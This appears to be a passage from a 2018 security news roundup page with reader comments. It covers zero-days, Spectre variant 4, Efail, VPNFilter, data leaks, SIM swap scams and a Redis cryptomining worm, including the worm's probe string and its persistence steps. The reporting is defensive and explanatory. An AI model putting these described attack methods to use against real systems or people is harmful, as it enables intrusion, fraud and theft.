During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.
We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.
Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.
Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.
A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.
Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.
Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.
Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.
A critical vulnerability in the DHCP client in Red Hat Enterprise Linux could allow an attacker to execute arbitrary commands on impacted systems.
Tracked as CVE-2018-1111, the security flaw was reported by Felix Wilhelm from Google’s Security Team. The bug was discovered in the NetworkManager integration script included in the DHCP client packages.
The vulnerability features a CVSS3 Base Score of 7.5 and can be exploited without special privileges. However, an attacker targeting the bug could execute arbitrary commands with root privileges on vulnerable Red Hat systems.
The DHCP client package in Red Hat includes a script for the NetworkManager component. The script is executed each time NetworkManager receives a DHCP response from a DHCP server. Thus, a malicious DHCP response could be used to cause the script to execute arbitrary shell commands.
“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol,” Red Hat explains.
The British cyber-security expert credited with thwarting a major ransomware attack is attempting to prevent a phone call transcript being used against him in the US courts.
The document quotes Marcus Hutchins as saying that he wrote code for an unidentified third-party, who then used it to make bank-hacking software.
Mr Hutchins has been accused of creating and distributing the password-stealing malware Kronos.
He has denied the charges.
The Ilfracombe, Devon-based researcher rose to prominence a year ago when he halted the Wannacry ransomware attack
“So, I wrote code for a guy a while back who then incorporated it into a banking malware,” Mr Hutchins is quoted as saying during the phone call after his arrest.
Zack Whittaker / ZDNet:
A bug in the website of LocationSmart, which sells real-time phone location data, let anyone track people’s locations across North America without consent — The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time. — A company that collects the real …
The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time.
A company that collects the real-time location data on millions of cell phone customers across North America had a bug in its website that allowed anyone to see where a person is located — without obtaining their consent.
Earlier this week, we reported that four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.
The company, LocationSmart, is a data aggregator and claims to have “direct connections” to cell carriers to obtain locations from nearby cell towers. The site had its own “try-before-you-buy” page that lets you test the accuracy of its data. The page required explicit consent from the user before their location data can be used by sending a one-time text message to the user. When we tried with a colleague, we tracked his phone to a city block of his actual location.
But that website had a bug that allowed anyone to track someone’s location silently without their permission.
The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.
A quarter of Asia-Pacific companies have experienced a security incident, while 27 percent aren’t even sure because they haven’t conducted any data breach assessment–even as the region is estimated to have lost US$1.75 trillion last year due to cyberattacks.
Lily Hay Newman / Wired:
Operator of malware-testing service Scan4You, which helped hackers evade antivirus software, convicted by US jury after Trend Micro gave data to the FBI — MOST ANTIVIRUS SCANNERS play a classic cat and mouse game: They work by checking software against a frequently updated list of potential threats. https://www.wired.com/story/inside-scan4you-takedown
Music Business Worldwide:
After reports that Tidal is inflating streaming numbers for big stars and is late paying royalties, company hires cybersecurity firm to investigate breach
Under-fire streaming platform TIDAL has announced that it has enlisted an “independent, third party cyber-security firm” to investigate a potential data breach at the company.
Its reason for doing so, however, is slightly confusing: the platform strongly denies claims recently made by Norwegian financial newspaper Dagens Næringsliv, which suggest that the accounts of TIDAL subscribers were manipulated in 2016 to falsely bulk up streaming numbers allocated to Kanye West’s The Life Of Pablo and Beyoncé’s Lemonade.
Cyrus Farivar / Ars Technica:
Alleged owners of Mugshots.com, a site that publishes mugshots and demands payment for removal, arrested on extortion, money laundering, identity theft charges
Dan Goodin / Ars Technica:
McAfee report: North Korea-linked hackers posted three apps on Google Play to steal personal info from defectors; hackers made contact with targets via Facebook
Researchers said a team of hackers tied to North Korea recently managed to get the Google Play market to host at least three Android apps designed to surreptitiously steal personal information from defectors of the isolated nation.
The three apps first appeared in the official Android marketplace in January and weren’t removed until March when Google was privately notified. That’s according to a blog post published Thursday by researchers from security company McAfee. Two apps masqueraded as security apps, and a third purported to provide information about food ingredients. Hidden functions caused them to steal device information and allow them to receive additional executable code that stole personal photos, contact lists, and text messages.
The apps were spread to selected individuals, in many cases by contacting them over Facebook. The apps had about 100 downloads when Google removed them.
Patrick Winn / GlobalPost Investigations:
Interviews with experts and defectors detail North Korea’s Reconnaissance General Bureau, whose hackers are estimated to have stolen $650M+ — The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews.
The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews. In just the past few years, RGB hackers have struck more than 100 banks and cryptocurrency exchanges around the world, pilfering more than $650 million. That we know of.
Chance Miller / 9to5Mac:
Apple is telling developers to remove CallKit from apps listed in App Store in China after government request, likely because of CallKit’s VoIP functionalities — Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps …
Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps, the company is now removing applications that use the CallKit framework. The move comes in response to newly enforced regulation from the Chinese Ministry of Industry and Information Technology, according to a message obtained by 9to5Mac…
T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.
Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked.
So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or or an automated call that reads the one-time code aloud.
A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.
However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.
Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.
The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.
Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.
Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.
At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.
“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.
The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.
Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.
Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.
CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.
Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.
While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.
One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.
The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.
A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.
John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.
The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.
Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.
A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributing a new bot, Fortinet researchers warn.
Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.
The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.
Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.
Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.
Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim’s computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.
Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business emails. Often O365, but also some Gmail and on premise systems with webmail access.
The objective is simple, use the system to convince the organisation, or a customer of the organisation to pay a fake invoice and transfer the money overseas. The average net of these breaches is around $85,000, but there have been cases well into the 7 figures. So quite worthwhile for the attacker. Most organisations are not set up to prevent or detect this kind of attack until it is too late.
Whilst similar to whaling emails the approach is more thought out and structured. The attacks are typically targeted. There are two scenarios we usually see:
Compromise victim company, identify invoices to be paid by the victim, spoof the company to be paid and convince the victim to pay to an incorrect account.
Compromise victim company, identify customer invoices to be paid to the victim, Spoof the victim and convince customers to pay invoices into an incorrect account.
There are a few opportunities to detect or prevent these kinds of attacks:
Prevent
Have a robust payment changing process – validate using details you have in your database and call them regardless of whether someone called you
Don’t pay to overseas accounts – especially when previous invoices were payed within the country.
Check previous payments – Where did they go, is this different, if so halt the payment.
Disallow forwarding rules to external addresses – This won’t stop it, but does make it more difficult
Multi Factor Authentication (MFA) on mail
Detect
Logins from locations other than your office
Logins where the IP address changes – we see many use open proxies when logging into a victim account. In logs that looks like the person travels rapidly across the globe.
Regularly interrogate rules created in the email product – this is often how we find the other compromised accounts.
Public accessible Redis servers are being exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days, we’ve seen 173 unique IP addresses that have been infected with this worm, whereof 88% of the infected servers are located in China, 4% in the US and 4% Hongkong.
The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and finally looks for new targets. It will send the payload “*1\r\n$4\r\nINFO\r\n” and check the response for the string “os:Linux”, to prevent replication to other operating systems.
When the cron job executes, the worm will disable security, close the existing publicly open Redis port using iptables, disable SELinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case, transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, that’s assumed to be the reason that a copy will be made on each replication.
On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction.
By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker controlled-server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.
The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world.
Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients.
How Efail was disclosed to the PGP community
Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us.
Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding.
All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.
There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal.
A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.
Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.
The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.
A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.
The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.
The researchers discovered that the application uses a SSL connection and uses SSL pinning to prevent tampering.
The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.
The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide “the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient.”
Zack Whittaker / ZDNet:
TeenSafe, an app for parents to monitor kids’ phone use, stored some app login passwords and kids’ Apple ID credentials in plaintext on an unsecured AWS server
Exclusive: A server stored teenagers’ Apple ID email addresses and plaintext passwords.
At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.
The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.
Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.
Robert Wiggins, a UK-based security researcher who searches for public and exposed data, found two leaky servers.
Both of the servers was pulled offline after ZDNet alerted the company,
“We have taken action to close one of our servers to the public and begun alerting customers that could potentially be impacted,” said a TeenSafe spokesperson told ZDNet on Sunday.
The database stores the parent’s email address associated with TeenSafe, as well as their corresponding child’s Apple ID email address. It also includes the child’s device name — which is often just their name — and their device’s unique identifier.
there were at least 10,200 records from the past three months containing customers data
TeenSafe claims to have over a million parents using the service.
We contacted a dozen people over iMessage, one by one, to confirm their passwords
It’s not clear why the data, let alone passwords for teens’ Apple IDs, was stored in plaintext.
The company claims on its website that it’s “secure” and uses encryption
Just as hackers want verification for credibility or acclaim, some breach sites want news coverage to sell something. The hacked companies want to know so they can disaster-manage (companies get hacked because their security is bad, not because the hackers are always that good), and news outlets want the exclusive.
But also — verification is important for the victims. The sooner victims know about data breaches, the sooner they can protect themselves.
Make no mistake, verifying data isn’t an easy process. It’s time consuming, laborious, and not always fruitful.
Logging into someone else’s account without permission is illegal in the US.
Besides, that still wouldn’t be enough to verify a breach
When reporters verify breaches, they walk a line to ensure they’re not intrusive or inconveniencing people. One of the easiest ways to begin verifying a breach is by enumerating disposable Mailinator email accounts through a website’s password reset field. Reporters also have to examine the data
This boom in hack reporting has in part led to a cycle of more awareness and coverage, which has led to more data breach monitoring and notification sites popping up
A fourth variant of the data-leaking Meltdown-Spectre security flaws in modern processors has been found by Microsoft and Google researchers.
These speculative-execution design blunders can be potentially exploited by malicious software running on a vulnerable device or computer
Variants 1 and 2 are known as Spectre (CVE-2017-5753, CVE-2017-5715), and variant 3 is Meltdown (CVE-2017-5754). Today, variant 4 (CVE-2018-3639) was disclosed by Microsoft and Google researchers.
It affects modern out-of-order execution processor cores from Intel, AMD, and Arm, as well as IBM’s Power 8, Power 9, and System z CPUs. Bear in mind, Arm cores are used the world over in smartphones, tablets, and embedded electronics.
The fourth variant can be potentially exploited by script files running within a program – such as JavaScript on a webpage in a browser tab
According to Intel, mitigations already released to the public for variant 1, which is the hardest vulnerability to tackle, should make attacks leveraging variant 4 much more difficult.
So far, no known exploit code is circulating in the wild targeting the fourth variant.
Another bug, CVE-2018-3640, was also disclosed: this is a rogue system register read, allowing normal programs to peek at hardware status flags and the like in registers that should only really be accessible by the operating system kernel, drivers, and hypervisors.
Variant 4 is referred to as a speculative store bypass. It is yet another “wait, why didn’t I think of that?” design oversight in modern out-of-order-execution engineering.
The name Spectre was chosen deliberately: it is like observing a ghost in the machine. Private data can be discerned by watching the cache being updated by the processor’s speculative execution engine. This speculation is crucial to running chips as fast as possible
Intel, Arm, et al response
“Variant 4 uses speculative execution, a feature common to most modern processor architectures, to potentially expose certain kinds of data through a side channel,” said Leslie Culbertson, Intel’s executive veep of product security.
“Starting in January, most leading browser providers deployed mitigations for Variant 1 in their managed runtimes – mitigations that substantially increase the difficulty of exploiting side channels in a web browser. These mitigations are also applicable to Variant 4 and available for consumers to use today.”
According to Culbertson, Intel and others will issue new microcode and software tweaks to more fully counter malware exploiting the fourth variant.
“We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.
“This mitigation will be set to off-by-default, providing customers the choice of whether to enable it or not. We expect most industry software partners will likewise use the default-off option.
If enabled, we’ve observed a performance impact of approximately 2-8 per cent
Arm will make available to system-on-chip designers updated blueprints for Cortex-A72, Cortex-A73, and Cortex-A75 cores that are resistant to Spectre variant 2, and the Cortex-A75 will be updated to resist Meltdown, aka variant 3.
Red Hat today published a substantial guide to the fourth variant, its impact, and how it works. VMware also has an advisory and updates, here,
We note that, so far, no malware has been seen attacking any of the Spectre and Meltdown holes in today’s chips, let alone this latest variant
Speculative Store Buffer Bypass is a security vulnerability that allows unauthorized users to steal sensitive information through websites. Similar to the Spectre and Meltdown threats in early 2018, it exploits speculative execution–a process most computers use to speed up routine tasks
FireEye on Monday announced the availability of a platform to allow organizations and pentesters check their ability to detect and respond to OAuth abuse attacks.
OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user’s data without the need for credentials.
“In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.
In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).
An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.
Germany’s federal cyber agency called on chip and hardware-makers to address new vulnerabilities discovered in computer central processing units, but said no complete fix was possible at the moment.
The BSI agency said its analysis showed the new flaws, dubbed Spectre-Next Generation, resembled the Meltdown and Spectre bugs discovered in January and could allow attackers to access personal data such as passwords and encryption keys.
While no new attacks were known outside laboratories, there was a risk that attackers could develop new methods based on detailed information that had been disclosed, it added.
Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.
A team of researchers published a paper(PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.
But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients., but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption all together just makes no sense.
Aside from the massive false alarm, Efail is a very interesting exploi
Efail Does Not Directly Exploit PGP
In a nutshell, if an attacker is able to get access to a user’s encrypted email, they can modify the message in a specific way and send it back to the user. The user’s email client will the decrypt the message and (if the email client is rendering HTML tags) automatically send the decrypted message back to the attacker.
The encryption itself it is not broken in any way. It’s how the messages are processed by the user’s email client that introduces the vulnerability. Saying PGP is broken is just plain wrong
Efail Builds On the Concepts of Tracking Pixels
Efail uses this kind of remote loading of images as the backchannel to exfiltrate the decrypted email. Other methods should also be possible. Efail takes advantage of the email client first has to decrypt an encrypted message in order to show it and then it renders the HTML code in the message.
Malleability Gadgets
We’ve seen how simple it is to implement a direct exfiltration channel in order to decrypt email. In some email clients, that technique does not work, so the Efail paper describes a more generic way to introduce the exfiltration channel inside the actually encrypted data itself.
Conclusion
My hopes is that the reader realizes two things: that the encryption of emails is still generically safe and that rendering HTML in emails is still not a good idea.
To protect yourself against this vulnerability, and a lot of others, disable HTML rendering in your email client. Many email clients allow for this and/or have settings to disable the loading of remote content.
Comcast has just been caught in a major security snafu: revealing the passwords of its customers’ Xfinity-provided wireless routers in plaintext on the web. Anyone with a subscriber’s account number and street address number will be served up the Wi-Fi name and password via the company’s Xfinity internet activation service.
Update: Comcast has taken down the service in question. “There’s nothing more important than our customers’ security,” a Comcast representative said in a statement.
I’ve typed in an Internet address and with the slip of a finger ended up on some funky website. One typo.
Scammers love typos. And to capitalize on them, they hijack popular web addresses and cybersquat on URLs that are a typo away from legitimate websites. It’s a scheme called “typosquatting,” and it is intended to trick Internet users, according to Fraud.org, a project of the National Consumers League.
“If a user is unlucky enough to mistakenly type in the wrong address, they may be taken to a booby-trapped website filled with viruses and malware, or to a website that looks just like the legitimate website but is designed to gather their personal data for scammers,”
Close to 12 million online users visited potentially dangerous websites during the first quarter of this year
Krebs warned readers that “malicious websites ending in ‘.cm’ that mimic some of the world’s most popular Internet destinations
Here are two of the tips.
— Double check what you’re typing.
— Bookmark websites you visit often
Amazon hasn’t exactly kept Rekognition under wraps. In late 2016, the software giant talked up its facial detection software in a relatively benign AWS post announcing that the tech was already being implemented by The Washington County Sheriff’s Office in Oregon for suspect identification.
The ACLU of Northern California is shining more light on the tech this week
“raises profound civil liberties and civil rights concerns.”
U.K.-based security researcher Robert Wiggins has found two exposed TeenSafe servers, leaking the passwords and information of some users of the monitoring service.
TeenSafe is meant to protect teenagers by letting their parents monitor their texts, phone calls, web history, location and app downloads. The breach was first reported by ZDNet.
According to the report, TeenSafe left two of their servers, which were hosted on AWS, exposed and viewable by anyone.
The FBI apparently gilded the lily in its long campaign against consumer cryptography, telling the world it held more locked phones than it did.
At issue is the Feds’ claim that it’s seized 7,000 phones it can’t crack because they’re encrypted.
He upped the ante in December 2017, telling a Congressional budget hearing the FBI couldn’t access the content of “approximately 7,800 mobile devices” in spite of having the legal authority to.
However, the Washington Post is now reporting that number was “inflated”, and instead, the FBI only has between 1,000 and 2,000 phones.
The WashPo said the error was discovered about a month ago, and since then the FBI has been trying to get a more accurate count, and an audit could take weeks.
The agency gave the newspaper a statement blaming the error on “programming errors” that delivered “significant over-counting of the devices reported”.
Jim Finkle / Reuters:
Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …
Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.
The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.
Cisco, which uncovered the campaign several months ago, alerted authorities in Ukraine and the United States before going public with its findings about the malware it dubbed VPNFilter.
Cisco described the mechanisms that the malware uses to hide communications with hackers and a module that targets industrial networks like ones that operate electric grids, said Michael Daniel, chief executive officer of Cyber Threat Alliance, a nonprofit group.
VPNFilter has infected devices in at least 54 countries, but by far the largest number is in Ukraine
FBI agents armed with a court order have seized control of a key server in the Kremlin’s global botnet of 500,000 hacked routers, The Daily Beast has learned. The move positions the bureau to build a comprehensive list of victims of the attack, and short-circuits Moscow’s ability to reinfect its targets.
The FBI counter-operation goes after “VPN Filter,” a piece of sophisticated malware linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.
A new threat which targets a range of routers and NAS devices is capable of knocking out infected devices by rendering them unusable. The malware, known as VPNFilter, is unlike most other IoT threats because it is capable of maintaining a persistent presence on an infected device, even after a reboot. VPNFilter has a range of capabilities including spying on traffic being routed through the device. Its creators appear to have a particular interest in SCADA industrial control systems, creating a module which specifically intercepts Modbus SCADA communications.
According to new research from Cisco Talos, activity surrounding the malware has stepped up in recent weeks and the attackers appear to be particularly interested in targets in Ukraine.
Q: What devices are known to be affected by VPNFilter?
A: To date, VPNFilter is known to be capable of infecting enterprise and small office/home office routers from Linksys, MikroTik, Netgear, and TP-Link, as well as QNAP network-attached storage (NAS) devices. These include:
Linksys E1200
Linksys E2500
Linksys WRVS4400N
Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
Netgear DGN2200
Netgear R6400
Netgear R7000
Netgear R8000
Netgear WNR1000
Netgear WNR2000
QNAP TS251
QNAP TS439 Pro
Other QNAP NAS devices running QTS software
TP-Link R600VPN
Q: How does VPNFilter infect affected devices?
A: Most of the devices targeted are known to use default credentials and/or have known exploits, particularly for older versions. There is no indication at present that the exploit of zero-day vulnerabilities is involved in spreading the threat.
My guest for this episode is Troy Hunt, well known security expert and creator of haveibeenpwned.com. It’s a service which allows you to check, whether your email has been leaked as a part of a data breach.
We talk about online security, including securing your accounts and using a password manager.
We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.
We are a professional review site that has advertisement and can receive compensation from the companies whose products we review. We use affiliate links in the post so if you use them to buy products through those links we can get compensation at no additional cost to you.OkDecline
269 Comments
Tomi Engdahl says:
Adobe Reader zero-day discovered alongside Windows vulnerability
https://blog.malwarebytes.com/threat-analysis/2018/05/adobe-reader-zero-day-discovered-alongside-windows-vulnerability/
During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.
We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.
Tomi Engdahl says:
Some Firefox Screenshots End Up Publicly Accessible
https://www.securityweek.com/firefox-saves-screenshots-publicly-accessible-cloud-servers
Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.
Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.
Tomi Engdahl says:
U.S. Jury Convicts Operator of Counter AV Service Scan4You
